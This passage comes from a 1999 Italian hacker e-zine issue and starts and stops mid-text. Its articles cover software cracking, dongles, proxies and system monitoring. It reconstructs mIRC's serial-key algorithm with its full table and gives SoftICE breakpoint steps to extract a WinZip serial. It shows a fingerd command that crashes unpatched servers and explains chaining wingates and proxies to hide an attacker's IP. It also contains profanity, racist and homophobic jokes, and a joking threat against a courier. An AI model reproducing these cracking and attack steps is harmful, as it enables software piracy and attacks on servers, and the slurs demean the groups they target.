viene usata la funzione _strchr che richiede come parametri l'indirizzo della stringa da analizzare e il carattere da cercare. new_address=_strchr(Password,'-'); if (new_address == 0) return 0; Password[new_address]=0; first_key=atol(Password); /* atol converte una stringa in intero a 32bit */ Password[new_address]='-'; second_key=atol(new_address+1); Avete capito come fa a suddividere la password ? Semmai new_address dovesse essere uguale a 0 il programma va in errore Una volta che il programma ha salvate le due password in memoria nelle variabili long utilizza la funzione _strlen(Name) per calcolare la lunghezza del nome e viene salvata in un'altra variabile che chiamaremo DELTA.. Ora viene la parte pi bella del programma, il calcolo delle password. Il mIRC32 nella versione 5.x dispone di una tabella interna di numeri che vengono impegnati per entrambe le password, quindi ecco scopiazzata dalla memoria l'intera tabella: 0Bh 06h 11h 0Ch 0Ch 0Eh 05h 0Ch 10h 0Ah 0Bh 06h 0Eh 0Eh 04h 0Bh 06h 0Eh 0Eh 04h 0Bh 09h 0Ch 0Bh 0Ah 08h 0Ah 0Ah 10h 08h 04h 06h 0Ah 0Ch 10h 08h 0Ah 04h 10h Ok questa tabella costituita da ben 38 elementi viene utilizzata dal mIRC per calcolare la password, quindi indispensabile. Passo 1 - Come calcolare la prima parte della password Per semplificare il lavoro (vengono utilizzati i registri, quindi noi creiamo per alcuni registri dei nomi fittizi) dichiariamo le seguenti variabili: counter, calc_pass, lenght_name, table_import, var1 Assegniamo i seguenti valori alle 4 variabili: counter=3; calc_pass=0; lenght_name=_strlen(Name) /* Lunghezza della nostra password! ;) */ table_import=0 /* Punta ad un elemento della tabella, lo 0 indica il primo, 1 il 2. e cos via var1 viene utilizzata per i nostri calcoli sporchi (... chiamateli come vi pare, ma non di sicuro qualcosa di legale!) Start_key1: Se counter == lenght_name vai a password_trovata Preleviamo dalla stringa Name il carattere puntato da counter quindi lo assegnamo a var1 var1=Name[counter]; Moltiplichiamo var1 per l'elemento puntato da table_import var1=var1*tabella[table_import] Sommiamo a calc_pass var1 calc_pass=calc_pass+var1 Aggiungiamo 1 a table_import Se table_import maggiore di 38 azzera table_import Incrementa counter Salta a Start_key1 password_trovata: Bene ora abbiamo in calc_pass il valore da noi cercato! la prima chiave (... ops... ma non legale, si ma che colpa ne ho io se il mIRC mette la password a disposizione nel registro ebx e fa un cmp ebx, [ebp+4] dove in ebx abbiamo calc_pass mentre in ebp+4 troviamo la prima parte della chiave da noi inserita!) Miei cari criminali (vi posso chiamare cos ?) ora cosa ci tocca... la 2. parte diranno i pi bravi e attenti... gi perch fino adesso abbiamo solo la prima parte della password (????-) Allora dichiariamo le stesse variabili! counter=3; calc_pass=0; lenght_name=_strlen(Name) table_import=0 var1 Gi ma a che cazzo serve al mIRC le iniziali del mio nome se poi mi va a prendere la 4 lettera del cazzo (quasi quasi dimenticavo di accennarvi... io faccio riferimento all'assembly e al borland turbo c++ dove il primo elemento di un array ha come indice +00 e non +01 (come i basicchiani ... o questo termine me lo sono inventato proprio adesso!)) Start_key2: Se counter == lenght_name vai a password_trovata Preleviamo dalla stringa Name il carattere puntato da counter quindi lo assegnamo a var1 var1=Name[counter]; Moltiplichiamo var1 * il carattere precedente! var1=Name[counter]*Name[counter-1] Moltiplichiamo var1 per l'elemento puntato da table_import var1=var1*tabella[table_import] Sommiamo a calc_pass var1 calc_pass=calc_pass+var1 Aggiungiamo 1 a table_import Se table_import maggiore di 38 azzera table_import Incrementa counter Salta a Start_key2 password_trovata: SIIIIII ORA var1 conterr il nostro secondo codice! Esempio pratico: cod ha un nome come tutti gli essere umani ma dato che cod di 3 caratteri (non protestate per il mio nick ma certe volte me ne sono capitati alcuni che meglio non protestare! me ne sono accorto dopo cosa avevo scelto x nome :( ma oramai ci sono abituato e tranne un bastardo di napoli che sfotteva nessuno mi ha mai detto niente... cod = Antonio ( il mio vero nome! :) che bello... chiss se il nome fa la differenza nella vita, di sicuro nel mIRC si! Metto in Name Antonio Codice: 4998-551106 Che bellooooooooooo ci sono riuscito! Senza dover ricorrere a sporchi trucchi.. Spero di essere stato un p chiaro, so che qualcuno mi vorr crocifiggere... Ora passiamo ai saluti tanto per chiudere questo articolo: eXceptiON HandlER : SOURCE OF KAOS resta sempre SOURCE OF KAOS Mauro32 : Grazie per spacecdr e per tutto quello che sai! Artiglio : IN GALERA IO NON CI VADO! MAIIIIIIIII SoftWord : NOP ... ops.... forse meglio evitarlo un p LanDLorD : Sto ancora aspettando quel pacchetto da crackare! : Quando me lo mandi ?? Techno Knight : MA CHE FINE HAI FATTO ? DeViLNeT : Scusa x quella battuta fuori luogo la prima sera che ci : siamo conosciuti! ^WaR^CaT^ : ??? SE QUALCUNO LO VEDE MI FACCIA SAPERE! anto1 : \ M4TRIX : / CHE FATE IN VACANZA DI BELLO ? IO QUALCOSA DI UTILE _JohNnY- : Ti stai spassando ?? QUANDO TORNI A CASA FAMMI SAPERE Capotribu : CIAO CAPO MaLaTtIa : Pensi che sia utile a qualcosa ? Kai01 : ciao kai! non ci conosciamo bene ma sar una cosa da poco CrackMan : Al contrario di quanto dice il nick non cracka... ma : una brava persona! (come del resto tutti noi...) |-g3no-| : GENO... non trova mai niente di utile da scaricare! BigJIM : lamerlogs.cjb.net ! Quando torna dalle vacanze quello : prende un accidenti!!! L'abbiamo combinata grossa? NOO Un saluto ai membri di ringzer0 i primi ad avere coraggio in italia ad esporre tutte le loro idee sull'arte dell'inverso! UN APPLAUSO A QUESTI BRAVI RAGAZZI... CONTINUATE COS CHE POI CI VEDIAMO IN CARCERE N0BODY88 PER AVER CHIESTO UNA COLLABORAZIONE SENZA SAPERE COSA FACCIO! Per qualsiasi chiarimento, suggerimento, complimento ecco la mia e-mail: cod@gurlmail.com Mi potete contattare su ICQ (chiedete a ZioFill, lui sa il mio numero! CIAO ZIOOOOOOOOOOOOOOO il 2 agosto, te sarai ad arrostirti al sole e io invece mi sono appena rasato a 0 x prendere un p di fresco al cervello altrimenti chiss cosa mi pu passare nella testa!) Questo non un saluto ma bens il contrario! A tutti quei deficenti di Vibo Valentia che si credono DIO e poi sono una massa di coglioni! Sapete da dove si accende il computer??? A me pare di no VAFFANCULO A TUTTI I MIEI PROFESSORI CHE MI HANNO ROTTO PER ANNI A SCUOLA RINGRAZIO MIO CUGINO PER AVERMI DETTO IMPARA L'ASSEMBLER CHE TI PUO' TORNARE UTILE (SI ECCOME NO!) UN ALTRO VAFFANCULO AD UNA PERSONA DI CUI NON DICO NIENTE ALTRIMENTI GIA' DA QUEL MINIMO CHE LA CONOSCO SO CHE NON SI FA I CAZZI SUOI! VAFFANCULO A BERLINGUER CHE CON LA SUA RIFORMA DEL CAZZO MI HA TENUTO A SCUOLA PER OLTRE 80min PER FARE UN FOTTUTO ESAME ORALE (IL MIO MASTERIZZATORE CI IMPIEGA MENO A SCRIVERE 80min! CAZZOOOO) cod/e-ViP 02 08 1999 Ore 17:21 P.S. ora chiamo x vedere se il masterizzatore nuovo arrivato a consegna altrimenti giuro che se becco dove abito un corriere Bartolini prendo il fucile e gli sparo all'autista! P.P.S. Fottuta EVA!! Risponde la segreteria telefonica! E ho sul disco fisso oltre 3 giga da masterizzare pi il il secondo volume della raccolta pi pazza che ci sia (tutti gli strumenti x crackare e scrivere virus!) http://members.xoom.it/evip cod@gurlmail.com ͻ Ŀ MA XCHE' SBORSARE 29 DOLLARI PER REGISTRARE WINZIPPO ???? ٺ ͼ Dopo aver letto questo tutor non avrete + bisogno di cercare on the net i serial per WinZip. Potremo usufruire di Username/Serial personalizzati. Strumenti necessari: (Mitico) SoFtiCe, WinZip, 5 minuti di tempo. Procuratevi la versione 7.0 SR-1 del famoso WinZip (io ho usato questa) e installatela. Riavviate in modalita' MS-DOS e lanciate Softice. Aprite WinZip e clikkate su Enter Registration Code, quindi inserite un vostro nome. Io usero' come nome DeViLNeT. Dove dice Registration # mettete un numero a caso es. 12345678 Ora premete CTRL+D e scrivete BPX GETDLGITEMTEXTA (invio) Uscite da softice ripremendo CTRL+D Tornate a Winzip e clikkate su OK Riapparira' la finestra di softice Premete una volta F12 poi scivete: BC * (invio) BPX 407c43 (invio) e premete CTRL+D Ora vi trovate sulla stringa 407c43 Bastera' srivere D EAX (invio) ed ecco in basso sulla destra apparire il nostro Serial Nel mio caso sara' B6DC09AC Scrivete il serial su un pezzo di carta digitate BC * (invio) uscite da softice con CTRL+D ora al posto di 12345678 scrivete il vostro serial Click su ok WOW WinZip Registrato !!! In 5 min abbiamo risparmiato 29 Dollari . . . Alla prossima DeViLNeT devilnet@freemail.it ͻ Ŀ APPROFONDIMENTO SULLE CHIAVI HASP ٺ ͼ musica di supporto morale: Machine Head, Korn, Manowar,Helloween,Angra, Dickinson. saluto tutti i menbri di Crack-It ed in particolare i r|ngzeristi, ^courier, YaDo e Furb3t che mi ha spinto a scrivere questo 'tut'. Scrivo questo testo con il solo scopo didattico (hehehe), quindi, se fate qualche cazzata con questo testo ,be', cazzi vostri. Il mio obiettivo e' mostrare ai programmatori il funzionamento delle chiavi hasp in modo che, conoscendole meglio imparino a proteggere al meglio i propri prog, impedendo che questi vengano reversati. Per ogni critica(costruttiva) scrivetemi a black_druid@hotmail.com. Evitate di mandarmi insulti per cio' che ho scritto, se pensate che non serva a un cazzo, smettete di leggere ora. Argomenti trattati: 1.Introduzione alle chiavi 2.Metodi di protezione 3-Funzionamento 4-PCS Introduzione alle chiavi Hasp Le Hasp sono tra le migliori chiavi di protezione del software poiche', a differenza di altre utilizzano + metodi di protezione simultaneamente. Caratteristiche comuni delle hasp: -Il codice (Developer Code) che viene assegnato ad un acquirente e' univoco e non modificabile poiche' e 'salvato' all'interno di un ASIC (Application Specific Integrated Circuit) cioe' un circuito che si trova all'interno della chiave.In questo modo, anche smontando la chiave e' impossibile vedere tale codice. -Le password fornite con la chiave sono 2 e anch'esse non modificabili. -I metodi di protezione sono 2: Envelope e API. -Ogni chiave ha un ID number univoco. -Le hasp supportano una grande quantita' di compilatori. -Le hasp supportano diverse piattaforme(ibm pc, unix, apple e nec) -Utilizzo di algoritmi di protezione avanzati e di tecniche anti debugging sviluppati direttamente dalla casa costruttrice. -Utilizzo di comunicazioni criptate: le comunicazioni tra l'applicazione e la chiave e' criptata impedendo cosi' l'emulazione software della chiave. In commercio esistono numerosi tipi di hasp che si differenziano per le loro caratteristiche ma che hanno di base tutte le funzionalita' sopra descritte: -Hasp-3: la hasp + economica, senza memoria. -Hasp36:come la hasp3 ma utilizzata sui nec pc -MemoHasp: hasp dotate di una memoria di lettura/scrittura utilizzabile anche run-time Le MemoHasp si suddividono in MemoHasp-1(con 112 byte di memoria) e MemoHasp-4 (496 byte di mem). -NetHasp: come le MemoHasp-4 ma con alcune funzionalita' in piu': -connettendo una sola chiave ad un computer facente parte di una rete, l'hasp e' in grado di proteggere un software e limitare il numero dei pc che possono usare tale applicazione. -TimeHasp e TimeHasp-4: dotate di un real time clock che le rendono particolarmente adatte alla protezione time-limited demo. Hanno una zona di memoria di 16 byte che contiene informazioni sulla data di 'scadenza' di un'appl. (le TimrHasp-4 hanno un'altra zona di memoria di 496 byte). Pausa, vado un attimo a bere, torno subito. Metodi di protezione 1-Envelope il metodo envelope consiste nel proteggere e criptare uno o piu' EXE (o anche Win DLL) dell'applicazione in modo da renderla (secondo i tecnici hasp) non debuggabile e non disassemblabile . 2-API questo metodo consiste nell' utilizzare le API specificatamente create per le hasp all' interno di un'applic. Attraverso le API si possono inserire call all'interno del prog da proteggere per verificare la presenza della chiave, verificare le password, ecc. Le api supportano una grossa quantita' di compilatori e sistemi operativi : dos, windoz, windoz32, os/2; Ah, dimenticavo, le api sono protette e criptate. E' possibile utilizzare entrambi i metodi di protezione (soluzione piu' sicura) oppure uno dei due. Le chiavi hasp consentono inoltre di utilizzare il metodo PCS (pattern code security) che spiegero' in dettaglio piu' avanti. Le Hasp come ho gia' scritto sopra impediscono il debugging ed il disassembling del codice in questo modo: -'bloccando' gli interrupt del debugger rendendo difficile l'attivazione del debugger stesso. -implementando 'trappole' speciali per gli hardware debugger. -rendendo difficile il tracing del codice. -utilizzando delle 'trappole a tempo' -usando il PCS -rilasciando spesso nuove release con nuovi metodi di protezione -inserendo il virus ebola all'interno della chiave e liberandolo all'esterno ad ogni tentativo di reversing riscontrato. -allegando al pacco contenente la chiave un negrone di 2 metri particolarmen te dotato che si diverte col tuo culo in caso ti veda reversare N.B. gli ultimi 2 metodi di protezione sono ancora in fase di studio e verranno rilasciati solo con la release 7.0 (la casa produttrice dell'hasp cerca urgentemente volontari per testare i due nuovi metodi) Funzionamento Allora, come ho gia' scritto prima, ogni acquirente ha un codice (Developer code) univoco e non modificabile. All'interno di ogni chiave c'e' un circuito che contiene un algoritmo per la generazione di valori di ritorno e tale algoritmo si basa sul Dev Code. Per verificare che la chiave connessa sia effettivamente quella giusta, all'interno dell'applicazione invio alla chiave una o piu' call passandogli come parametro 1 numero casuale(seed code); il numero passatogli viene utilizzato (dal circuito con l'algoritmo) per calcolare 4 codici di ritorno che andro' a verificare per vedere se la chiave connessa e' quella giusta. Per rendere piu' dura la vita del reverser si devono usare le funzioni messe a disposizione dalla casa produttrice dell'hasp cioe' bisogna eseguire spesso call per verificare i valori di ritorno (cambiando il seed code ogni volta), fare un check sull'id della chiave ecc. Per migliorare la protezione, il check dei valori di ritorno ed il seed value dovrebbero essere criptati e cambiati ogni volta (es. prendendo il valore della data attuale o dell' ora in modo che il prog abbia un numero pressoche' infinito d codici). Ovviamente due chiavi con Dev Code diversi, eseguendo una call con seed code uguale, rirorneranno dei valori diversi dato che l'algoritmo di computazione dei 4 valori di ritorno si basa sul Dev Code. PCS Per rendere ancora piu' duro il reversing delle chiavi hasp, quei quattro pirla degli sviluppatori hasp, hanno implementato una funzione chiamata pcs per cercar di far sclerare il reverser durante il tracing del codice. Infatti mentre senza pcs il funzionamento e' il seguente: 1 Chiamata alla procedura di protezione 2.verifica dei codici di ritorno 3.esecuzione di una determinata azione se i codici sono errati (chiudere l'appl, ecc). Con il pcs invece ad ogni chiamata di funzione, come per magia ne vengono generate un numero a scelta tra 1 e 25 ognuno con un seed code differente; non solo ma vengono generate in diversi punti del codice quindi son cazzi amari. bene, e' tutto raga, se volete ulteriori informazioni (anche sulle smart card) o chiarimenti scrivetemi a black_druid@hotmail.com oppure mi trovate in irc nel canale Crack-it spero che cio' che ho scritto sia stato in qualche modo utile a qualcuno altrimenti, be', me ne sbatto le palle. BlackDruiD. ۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰ ͻ Ŀ SOX...WINGAYZ E PROXY...CHE CONFUSIONE... ٺ ͼ Lo sapete che sto inkominciando a rompermi un po' le bolle della mia intro con le dediche ? ki se ne frega...sono skizzato..la faccio lo stesso.... tHiS aRt i5 dEd 2: NoboZ accanto a me che scura meglio di un maiale e che ha trasformato in okkasione del 54 anniversario di Hiroshima la nostra stanza in un revival dell'epoca!!! Th|$ 4RT |$ Vs-DeD To: Tutti coloro che mi hanno detto: quello che scopri di hacking tienitelo per te! Rotto di palle dalle incessanti domande su IRC tra le differenze tra questi 3 sconosciuti mi accingo con flautolenza a scrivere quelle penso siano le principali differenze tra di loro. Scusate le eventuale lamerate....caxxate o fesserie varie...ho fatto tutto in buona fede..... :) Innanzi tutto partiamo da cio' che li accomuna: il coprire il vostro ip. Partiamo dai proxy.... ^^^^^^^^^^^^^^^^^^^^^^ I proxys sono dei particolari servizi offerti da dei server per viaggiare anonimi nel web o scaricare senza log tramite ftp. Settarne uno e' semplicemente una stupidata.....prendetene uno qualsiasi (proxys4all.cgi.net) andate nelle opzioni di internet del vostro browser preferito e settate come proxy l'ip del server che offre il servizio e come porta la famosa 8080 o anke la 80.....cambia da server a server ma di solito sono sempre queste 2 dato che il servizio http di un server si puo' normalmente trovare sulla porta 80. Usare un proxy e' estremamente utile se si vuole provare un attaco tramite exploit remoto del proggie phf. I SoX ^^^^^ I Socks hanno la stessa identica funzione dei proxy ma essi sono comunemente usati in IRC. Trovato un particolare ip che abbia la porta 1080 aperta potrete selezionare nelle opzioni del vostro client IRC l'opzione firewall selezionare usa sock 4 ed immettere al posto del firewall l'ip con la 1080 aperta e come porta....indovinate quale ??? Provate ora a joinare un canale e a chiamare voi stessi in query....noterete che il vostro ip diventato quello del server utilizzato....e ki vuole nukkarvi o floodarvi ora come fa ?Si spara le pugnette e se e' un lamer non accorgendosi dello strano ip cerchera' di floodare il server e voi avrete il qoolo parato. Il preservativo dell'hacker: il Wingate Avete bisogno di telnettarvi ad un sistema....volete coprire il vostro ip... come fare ??? Wingate! Mi avrete gia' preso per un pazzo maniaco sessuale ed in effetti avete proprio ragione ma le analogie tra un Wingate ed un preservativo sono molte. Immaginiate che il server sia una mignottona che cerca di rimanere incinta per poi sposarvi (rimanere loggati)....voi ovviamente non volete rimanere legati a questa persona per tutta la vita anzi siete dei grandi playboy ed avete una gran voglia di farvi altre 1000 femmine....bene...cosa usate per evitare cio' ? Il mitico condom...alias in rete...wingate.... Telnettatevi ad un server che voi sapete offra questo servizio sulla porta 23 e avrete un prompt di questo tipo Wingate:$> adesso dovrete solo immettere l'ip del server a cui volete telnettarvi con, seguito da uno spazio, la porta alla quale vi volete connettere e tutto vi sembrera' + bello ! heheh...... Ma ogni tanto i presevativi si bukano no ? e allora voi per stare + sicuri cosa fate ? 'mannate a fangoolo la parsimonia e ne usate + di uno insieme... stessa cosa facciamo noi nell'hackin'....ne paghiamo in perdita di velocita' ed inkominciamo a telnettarci da un Gate all'altro fino a poi ad arrivare al server che in realta' ci vogliamo pompare.... Battuta demente: Sai dove va a fare benzina l'hacker ??? alla shell. Basta basta basta.....ci vediamo un'altra sera...ciao...bye bye bye bye bye .......DaNtUccIo AliGhIeRiNo....... ͻ Ŀ ER COSIDDETTO MONITORAGGIO ٺ ͼ Eccovi un bell'articoletto tutto x voi sysadmin e x voi hacker dagli occhi e dal cervello bramosi di conoscenza...oggi vi parlero' di... ER COSIDDETTO (MOLTO RICHIESTO MA MOLTO IGNORATO) MONITORAGGIO ...ovvero come vivere felici senza sentirsi bruciare il culo ogni volta che qualke quattordicenne in cerca di gloria ti fotte il sistema... Il monitoraggio della sicurezza consiste nella ricerca continua di bug, bachi, vulnerabilita', problemi e ovviamente di soluzioni ai problemi riscontrati all'interno del proprio sistema. Ci sono diversi metodi e strumenti da utilizzare e di questi io andro' solo a elencarvi la lista e l'utilizzo o lo scopo di ognuno dato che scendero' in ognuno degli argomenti della lista nei prossimi numeri di NewBies, quindi non aspettatevi troppo da questo articolo, che, come appena detto, vuole essere solo un index con qualche precisazione in piu'. Ecco a voi la lista: {[>-<]}- controllo dei log = il controllo dei log puo' essere definita come la parte + importante nella manutenzione del nostro sistema e va considerato il metodo + d'aiuto nel cercare se qualcuno e' entrato nel nostro sistema lasciando tracce nei log. A questo proposito va detto che e' molto utile installare dei log aggiuntivi normali e magari farsi in c un program ma che cripti un altro log aggiuntivo cosi' che l'hacker del momento non riesca a cancellare il proprio ip o l'user usato x entrare cosi' che, nel momento in cui diventi root e si accorga del log criptato, debba x forza di cose cancellare l'intero file e quindi scoprirsi ai vs occhi di sysadmin (che non siete altro :P). {[>-<]}- antivirus: ovviamente servono x ricercare virus nel vostro sistema e sono + utili di quanto si pensi...ovviamente se incontrate un virus serio non servono a niente ma di solito chi e' bravo e fa virus "da paura" non li da' in giro ma li fa solo x dimostrare a se' stesso che e' un ottimo programma tore e che riesce a creare qualcosa di nuovo... {[>-<]}-password crackers: servono a prevenire il cracking delle password, ovvero l'operazione tramite la quale si cerca di scoprire le password confrontandole con quelle + comuni e con dei dizionari di pass + usate a 2a della lingua usata nel paese dove e' situato il sito e / o server quindi una volta appurata la semplicita' della password (molte volte coinciden te o cmq simile al login o al nome del utente reale) questa va segnalata all'utente che dovra' quindi provvedere a cambiarla e dopo di cio' si provvedera' a rifare l'operazione detta "vediamo se mi trovo la pass brutto bastardo" ;) {[>-<]}-uso di prog che rilevano eventuali intrusioni: questa operazione consiste principalmente nell'uso di programmi che analizzano ben benino tutti i vari log e i registri segnalando i vari problemi e/o intrusioni e a volte anke parametri di configurazione sbaglia ti o "troppo permissivi" segnalandone quindi i vari bug scoperti (esempio: satan) e i possibili programmi che usati in un certo modo (cioe' tramite l'uso di exploit) potrebbero servire x eventuali attacchi e intrusioni. Le soluzioni quindi sono controllare se ci sono nuove versioni x i prog trovati "exploitabili" o verificarne la eventuale necessita' che in poke parole vuol dire "se non ve serve che lo tenete affa????". {[>-<]}- conta-lunghezza-file: di questa categoria fanno parte dei programmi che non fanno altro (come fosse poco) che rile vare la lunghezza di ogni file presente sul vs sistema e di salvare tutti i numeri delle varie lunghezze dei file in un unico file e/o db con il quale fare delle verifiche periodiche ricon trollando le varie dimensione e stanando quindi eventuali manipolazioni causate da errori o anke da possibili "hackers". Basti pensare che molti di quei piratoni che ci sono la' fuori esaminano il sorgente di qualke programma inuti le (ovviamente non progs come cat, ls o cp!) dopodiche' li modificano introducendoci delle backdoor che gli permetteranno in futuro di diventar root scrivendo solo il comando con qualke stringa da loro immessa nel falso prog che e' andato a sostituire l'originale. E ovviamente questo non piacerebbe che succedesse proprio al ns server...o no =)))) La stessa procedura ovviamente puo' essere utile per scoprire eventuali virus o danneggiamenti vari fatti senza volerlo da utenti poco esperti o solo molto sbadati. {[>-<]}-configurazione del sistema: questa e' una delle parti piu' importanti nell'amministrazione di un sistema *nix e ricordatevi che nel 80% dei casi in cui un hacker vi brucia le chiappe e' dovuto al fatto che avete fatto una mala configuraz troppo permissiva oppure avete dimenticato di togliere qualke servizio, poike' anke solo il fatto di lasciare aperta la porta x fingare aiuta l'eventuale smanettone al lavoro nel conoscere gli utenti e quindi a sapere + info da utilizzare x tentare di scovare la loro pass. Se volete sapere la mia una configurazione perfetta c'e' ...provate a lasciare il server sconnesso con la spina staccata in una camera blinda ta tipo quelle delle bancke e poi venitemi a dire che vi hanno hackerato! hihihihihi {[>-<]}-aggiornamento software e mentale: oltre al cercare di avere sempre le ultime release dei progs del vs sistema cercate anke di documentarvi sulle varie mailing list dedite alla sicurezza infor matica e ai vari troian e virus e cercate di leggere tutti i vari bollettini delle sw-h come ad esempio quella microsoft (so che essendo in ambint *nix non serviranno a niente ma se e' vero che 5 minuti di risate allugano la vita allora avrete vita eterna....ahahahahahahahahahahahaha). FONTI : il mio cervello, varie riviste "del settore" di cui non so i nomi cioe' non ricordo dove o preso le info ma qui ho fatto un riassunto di cio' che ho imparato quindi alcune e-zine dal 93 in poi americane di cui mi sono appassionato ultimamente e che..non erano poi tanto male :) I RINGRAZIAMENTI QUESTA VOLTA VANNO A: Eugenio-Yago, Rigor MorteM, /sPIRIT/, (IN RIGOROSO ORDINE SPARSO) Vanadio, NightTiger, LordFelix, Dantuz, Blinking, DevilNet, Storm, drwxr--r--, Cod, Barninga Z, Vecna, Spymaster, VaFfa, Harlok, Blum, BlackJam, Ennaro, tutti gli Spp, tutti i BFI, e tutti quelli di #hackernow e tutti quelli che mi hanno chiesto se usciva NB4 :) I MAVATTINNNACHITTEMMUORTTT VANNO A: tutti quelli che mi hanno detto di non continuare NB, che, non sapendo, mi hanno dato quella marcia in + x riorganizzare (o meglio x riunire un po') il gruppo di amici NewBies. QUESTO ARTICOLO E' STATO FATTO PERCHE': ...dopo 30 min di telefonata con RigoR MorteM tutto e' possibile... Byez N0bodY88 proud newbies of NewBies Staff ۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰ ͻ Ŀ COME CAMBIARE IL NOME DI REGISTRAZIONE DI WINDOWS 95 E 98 ٺ ͼ IL tuo pc e' arrivato con windows 95/98 preinstallato? Non prendertela se vedi che sei registrato come OEMuser o qualche altro nome senza senso! O sei pentito che quando hai installato il tuo windows, ti sei registrato sotto il tuo vero nome? In ogni modo, cio' puo' essere rimediato. Questo e' quanto: 1. Fai una copia o + di backuo del tuo regedit di windows. Non sto scherzando. 2. Aprite regedit (seleziona Avvio/Start), scrivi regedit dopo aver scelto esegui, e premi invio. 3. Sotto HKEY_LOCAL_MACHINE, seleziona Software/Microsoft/Windows/CurrentVersion. 4. Fate doppio-click sulla RegisteredOrganization o sulle opzioni RegisteredOwner, e inserite i vostri cambiamenti. 5. Uscite, e riavviate windows. Se volete cambiare le informazioni dell'utente registrato x altri software, potete cercare in giro x la chiave software. Ma fate solamente un cambiamento alla volta, e ricordate di FARE SEMPRE IL BACKUP DEL REGEDIT!!! AUTORE = sconosciuto TRADUTTORE = N0bodY88 ͻ Ŀ FINGERD EXPLOIT ٺ ͼ Piattaforma: Qualsiasi piattaforma che faccia girare un non patchato fingerd Descrizione: Usare finger da remoto permette molteplici @, e permette bogus finger comandi. Exploit: Usando diversi login tu puoi farli apparire come un utente su hut.fi che sta usando il finger su un utente di nonhut.fi come questo: >finger jabba@hut.fi@nonhut.fi Questo puo' causare il crash di un server usando il riutilizzo del finger come in questo modo: >finger jabba@@@@@@@@@@@hut.fi Fix: Rimuovere finger dall' inetd.conf e killarlo. Patch?: http://prep.ai.mit.edu/pub/gnu/finger-1.37.tar.gz Source: Non ricordo. Questa traduzione e' stata fatta da N0bodY88 su un testo inglese di non so chi (l'autore non e' presente nel doc originale). Chi fosse a conoscenza del l'autore di tale doc mi faccia sapere che lo mettero' sul numero successivo di NewBies, dato che mi sta sul cax chi prende spunti e/o traduce e poi non da le fonti e i dovuti riconoscimenti...e magari fa spacciare il tutto come opera del proprio "ingegno"... Byez N0bodY88 ۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۲۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰۰ ۰۰۰۰۰۰۰۰۰۰۰۰ ͻ Ŀ INTERVISTA AD UN PERFETTO ANONIMO ٺ ͼ Questa intervista dedicata alle mosche che ci stanno letterlamente rompendo le balle e che inutilmente da un'ora cherchiamo di cattuare... * Ciao a tutti oggi ci troveremo col nostro Anonimo di turno, allora zio che si dice? - Ma vaffansedere che caxxo mi stai facendo st'intervista. Valla a fare ad un hacker...non a me!!! * Allora quando hai iniziato la tua carriera di spogliarellista? - Un paio di ani fa per necessita' fisiche... * E ti e' piaciuto fin da subito? - Certo l'idea di un mucchio di vecchiette che mi guardano ha sempre popolato i miei sogni erotici... * Cosa usi sempre per non lasciare tracce nelle tue vittime oltra ad uno sputtanatissimo Wingate ?? - Mi preservo sempre...uso sempre Settebrutto...max aderenza * Adesso cominciamo con le cose serie: quanti adepti hai formato? Perche' si sa che accanto alla scuola di Hokuto primeggia la scuola di Taned con la mortale mossa dei 7 log e dei 5 sniffer... - La mia e' una azienda a conduzione familiare, una societ a responsabilita' estremamente limitata ( srEl )... * Cosa ci puo' dire delle nuove evoluzioni del suo campo essendo proprio lei uno dei fondatori della disiplina ormai nota come cyber-sesso? - Bene il cyber-sesso si sta sempre + evolvendo...quando ripenso alle prime zozzone che mi sono goduto mi viene una nostalgia....le ragazze di ieri erano delle vere maiale mentre quelle di oggi sono solo delle frustrate che passano il tempo a farsi leccare la figa dal barboncino che hanno in casa ! * Quanti computer hai a casa e cosa ci fai ?? - Allora....ne ho una decina...tra cui un paio di server Linux...uno Unix ed un VAX/VMS d'epoca.....per mi diverto molto con il mio pentium III di produzione Microsoft a giocare con Flight Simulator..il miglior gioco mai prodotto....ovviamente ho montato il fedele Windows 98...l'OS perfetto ! * Spiega in 5 righe come crakare un programma.... - 5 ??? sono troppe !!! astalavista.box.sk ---> crack+programma o anke andare dal negoziante di fiducia e comperare il prodotto...facile no ? * Che libri leggi di solito ??? - Allora il mio libro preferito sempre stato fin dall'et di 5 anni il libro intitolato "Necrofilia...oggi e ieri 2 realt a confronto" me lo leggeva mia madre prima di addormentarmi...un altro libro che mi ha molto colpito stato "Il sadomasochismo dalla A alla Z" che segu ad una profonda rilettura del libro "Analit profonda" dal quale era stato tratto il film "Holly si fa HollywooD" * Che canali frequenti ?? - #gay.it #piazzamelo_dietro #sukkia #checca.it #vienimi_dentro #cappella_suck #sadomaso.it ect. ect. bei canali e bella gente.... ma mai come quei bei maschioni su #hackernow !!!! *Che server hai bukato fino ad ora ??? -Mi sono comprato un bel trapano e con quello riesco finalmente a bukare i server...unico inconveniente quello che non posso farlo da remoto *Che cosa ne pensi del panorama italiano dell'Hackin' ed affini ?? -Benissimo...mi piace molto il progetto portato avanti dagli Spaghetti anke se non hanno ankora scoperto come non pagare le HotLine.... nel campo del Crackin' i ring0 la fanno da padroni....vorrei tanto crackargli il pistolino.....nell'hackin' i + conosciuti sono i softpj e gli spippolatori....che sarebbero capaci anke di bukarmi il sederino... mettendoci dentro qualke rootkit e riuscendo a sniffarmi anke le scorregge Poi...insomma sono tutti degli stalloni ideali no ??? *E di noi NewBies che ne pensi ??? -Bah....tutti ankora alle prime armi...vengono subito...al punto.... *Ti ringrazio molto della collaborazione e ci risentiremo appena sar capace di uscire dalla lugubrazione mentale + cupa in cui sei riuscito a spingermi....(non fraintendete) -Spero tanto che tu mi possa ripagare in natura....ma cmq non ci sono problemi dato che o sarei andato in palestra con il mio amico Stallone oppure mi sarei aCULturato sul news it.sesso.racconti arrivienerci Bei figoni.... Note dell'intervistato: Le balle crescono sempre di + a tutti e 2 e vi assicuro che non per una sovrapproduzione di sperma ma per una rottura che cresce ogni minuto a livello esponenziale...le balle sono piene...duke e quake non partono in rete....'na Roba...il Nobo inizia anke a sclerare e gastemare i vari cavetti e com.....basta scrivere.....passiamo ad altro...ci bekkiamo in rete e, consiglio da amico, se vi chiedo di 